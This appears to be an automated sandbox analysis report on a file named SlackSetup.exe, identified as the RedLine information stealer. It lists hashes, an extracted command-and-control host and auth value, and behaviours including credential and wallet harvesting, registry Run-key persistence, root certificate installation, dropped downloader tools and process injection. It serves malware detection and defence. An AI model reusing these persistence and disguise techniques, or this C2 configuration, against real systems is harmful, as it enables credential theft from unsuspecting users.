redline | 695f138dd517ded4dd6fcd57761902a5bcc9dd1da53482e94d70ceb720092ae6

Resubmissions

15-06-2023 13:48

230615-q4kk4she67 10

11-06-2023 18:58

230611-xmzr2aad3z 10

Analysis

max time kernel
603s
max time network
571s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
15-06-2023 13:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SlackSetup.exe
Size

364KB
MD5

a371421bfe2b541c078fc43b008a4e27
SHA1

f74b4931c61a54ea12a10a5b6b48c8bb4dd4706b
SHA256

b8f5519f7d66e7940e92f49c9f5f0cac0ae12cc9c9072c5308475bd5d093cdca
SHA512

653c62cc43ec2cda143cdce4ee633f6482a780cb83b36dafc9625f3406756909f5d7250b2d6610b57858b3154e7b461fddded2bc20436865d3e59ca88d96b5e8
SSDEEP

6144:tpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqlGwrZPHifJWP7w:tp8KLBzQ7Lcf3SiQs2FTTql9unNrkvfy

Score

10^/10

redline 2 discovery infostealer infostealer_generic persistence spyware

Malware Config

Extracted

Family

redline

Botnet

missunno.com:80

Attributes

auth_value
a2810548b2740462ea1c66aa3bc71f08

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Find unpacked information stealer based on possible SQL query to retrieve broswer data 1 IoCs

Detects infostealer.

infostealer_generic

resource	yara_rule
behavioral2/memory/3872-866-0x0000000000400000-0x0000000000440000-memory.dmp	infostealer_generic_browser_sql

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows\CurrentVersion\Run	slack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\com.squirrel.slack.slack = "\"C:\\Users\\Admin\\AppData\\Local\\slack\\slack.exe\" --process-start-args --startup"	slack.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows\CurrentVersion\Run	slack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\com.squirrel.slack.slack = "\"C:\\Users\\Admin\\AppData\\Local\\slack\\slack.exe\" --process-start-args --startup"	slack.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	ZGSFK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	3plugin_20230609.txt
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	SlackSetup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	slack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	slack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	slack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	3plugin_20230609
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	Current
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	Setups.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	Current
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	ZGSFK.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4996 set thread context of 3872	4996	2plugintbr	144
PID 4700 set thread context of 3816	4700	Current	152

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Executes dropped EXE 34 IoCs

pid	Process
1704	Setups.exe
864	wget.exe
4816	Update.exe
4524	winrar.exe
2280	svchost.exe
2380	slack.exe
2828	update.exe
4256	slack.exe
1616	slack.exe
4632	slack.exe
4132	slack.exe
4944	slack.exe
4704	slack.exe
3576	slack.exe
2084	slack.exe
724	slack.exe
4360	slack.exe
3740	pluginvtrbvo
1128	wget.exe
4324	winrar.exe
4996	2plugintbr
4368	wget.exe
3848	winrar.exe
4136	3plugin_20230609
3620	ZGSFK.exe
4700	Current
2724	wget.exe
3176	7z.exe
3648	2pluginwfewf.txt
5008	wget.exe
3580	7z.exe
3680	3plugin_20230609.txt
1648	ZGSFK.exe
1456	Current

Loads dropped DLL 37 IoCs

pid	Process
2380	slack.exe
2380	slack.exe
2380	slack.exe
4256	slack.exe
4256	slack.exe
4256	slack.exe
4256	slack.exe
4256	slack.exe
1616	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4132	slack.exe
4944	slack.exe
4704	slack.exe
4944	slack.exe
4944	slack.exe
4944	slack.exe
4944	slack.exe
4632	slack.exe
4632	slack.exe
3576	slack.exe
2084	slack.exe
2084	slack.exe
2084	slack.exe
2084	slack.exe
2084	slack.exe
724	slack.exe
724	slack.exe
724	slack.exe
724	slack.exe
724	slack.exe
4360	slack.exe
4360	slack.exe
3176	7z.exe
3580	7z.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1648	3620	WerFault.exe	142

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	slack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	slack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	slack.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	slack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	slack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	slack.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	slack.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2980	schtasks.exe
3116	schtasks.exe

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
368	timeout.exe
3008	timeout.exe
3384	timeout.exe
2192	timeout.exe
4548	timeout.exe
2860	timeout.exe
4752	timeout.exe
2768	timeout.exe
4604	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3892	tasklist.exe

Modifies registry class 28 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack\shell\open	slack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\slack\\app-4.32.122\\slack.exe\" \"%1\""	slack.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack	slack.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack\shell	slack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack\URL Protocol	slack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack\ = "URL:slack"	slack.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\slack\shell\open\command	slack.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	SlackSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	SlackSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	SlackSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	SlackSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	SlackSetup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1732	powershell.exe
1732	powershell.exe
1616	slack.exe
1616	slack.exe
4704	slack.exe
4704	slack.exe
3872	InstallUtil.exe
3872	InstallUtil.exe
3872	InstallUtil.exe
4632	slack.exe
4632	slack.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe
3816	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	3892	tasklist.exe
Token: SeDebugPrivilege	4816	Update.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
